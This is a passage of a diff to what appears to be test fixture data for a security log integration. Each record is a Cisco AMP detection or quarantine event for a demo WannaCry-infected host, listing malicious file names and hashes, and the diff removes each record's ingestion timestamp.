"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "severity": 2 @@ -2780,7 +2746,6 @@ ], "code": "553648143", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212743353Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2856,7 +2821,6 @@ ], "code": "2164260880", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212744169Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2932,7 +2896,6 @@ ], "code": "2164260880", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212744985Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -3008,7 +2971,6 @@ ], "code": "2164260880", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212745851Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -3084,7 +3046,6 @@ ], "code": "2164260880", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212746713Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -3162,7 +3123,6 @@ ], "code": "1090519054", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212747526Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "severity": 2 @@ -3265,7 +3225,6 @@ ], "code": "1090519054", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212748332Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "severity": 2 @@ -3362,7 +3321,6 @@ ], "code": "553648143", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212749167Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3434,7 +3392,6 @@ ], "code": "553648143", "id": "6419303569945526000", - "ingested": "2022-02-02T05:52:43.212749977Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -3508,7 +3465,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212757939Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -3598,7 +3554,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212758878Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 @@ -3692,7 +3647,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212761287Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 2 @@ -3793,7 +3747,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212762290Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 2 @@ -3890,7 +3843,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212763133Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -3976,7 +3928,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212763955Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -4066,7 +4017,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212764768Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{